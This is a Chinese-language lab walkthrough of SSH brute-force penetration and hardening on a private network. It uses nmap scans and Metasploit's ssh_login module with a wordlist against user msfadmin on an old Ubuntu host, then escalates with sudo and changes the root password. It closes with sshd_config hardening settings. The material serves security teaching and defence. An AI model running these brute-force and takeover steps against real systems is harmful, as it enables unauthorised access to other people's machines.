目录
[3.Kali Linux 进行 SSH 渗透](#3.Kali Linux 进行 SSH 渗透)
[3.Kali Linux 进行 SSH 防御](#3.Kali Linux 进行 SSH 防御)
一、实验
1.环境
(1)主机
表1 主机
|------------|--------|---------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |
(2)查看Kali Linux (2022.4)系统版本
bash
cat /etc/os-release
(3) 查看Kali Linux (2022.4)系统IP地址
bash
ip addr | grep 154
(4)查看Ubuntu 8.04 系统版本及IP地址
bash
lsb_release -a
bash
ip addr
2.nmap扫描目标主机
(1)扫描⽬标主机所在⽹段所有存活的主机
nmap -sP 192.168.204.0/24
(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本
22端口已开放
nmap -sV 192.168.204.143
3.Kali Linux 进行 SSH 渗透
(1)进入MSF 控制台
bash
msfconsole
(2) 搜索 ssh_login脚本
bash
search ssh_login
(3) 使⽤编号为 0 的脚本
use 0
(4) 设置⽬标主机
bash
set rhosts 192.168.204.143
(4)查看选项
bash
show options
(5)设置用户名与密码本
bash
set username msfadmin
bash
set pass_file zidian.txt
(6)运⾏脚本
bash
run
(7)查看会话
bash
sessions
(8)连接会话
bash
sessions 1
查看用户身份
bash
whoami
查看路径
bash
pwd
提升权限
bash
sudo -i
再次查看用户身份
bash
whoami
更改密码
bash
password root
(9)MobaXterm远程连接
连接
3.Kali Linux 进行 SSH 防御
(1)SSH安全配置(端口)
bash
vim /etc/ssh/sshd_config
修改端口
(2)重启
bash
/etc/init.d/ssh restart
(3)退出之前的MSF
(5)进入MSF 控制台
bash
msfconsole
(6) 搜索 ssh_login脚本
bash
search ssh_login
(6) 使⽤编号为 0 的脚本
bash
use 0
(7) 设置⽬标主机
bash
set rhosts 192.168.204.143
(8)设置用户名与密码本
bash
set username msfadmin
bash
set pass_file zidian.txt
(9)运⾏脚本
失败
bash
run
(10)nmap扫描端口
ssh端口为12345
bash
nmap -sV 192.168.204.143
(11)查看选项
bash
show options
(12) 设置目标端口
bash
set rport 12345
(13)运⾏脚本
bash
run
( 14)SSH安全配置(端口)
bash
vim /etc/ssh/sshd_config
修改登录验证时间
(15)重启
bash
/etc/init.d/ssh restart
(16)验证(等待1分钟)
(17)SSH安全配置(容错次数)
bash
vim /etc/ssh/sshd_config
修改容错次数
(18)重启
bash
/etc/init.d/ssh restart
(19)容错2次
二、问题
1.SSH有哪些安全配置
(1)配置
bash
Port 12345 //端口
LoginGraceTime 1m //登录验证耗时
PermitRootLogin no //不允许root远程登录
MaxAuthTries 2 //最大容错次数2
AllowUsers msfadmin@192.168.204.100 //允许指定用户在指定IP上登录
2.MSF 退出报错
(1)报错
bash
[*] You have active sessions open, to exit anyway type "exit -y"
(2)原因分析
有session会话正在运行。
(3)解决方法
bash
exit -y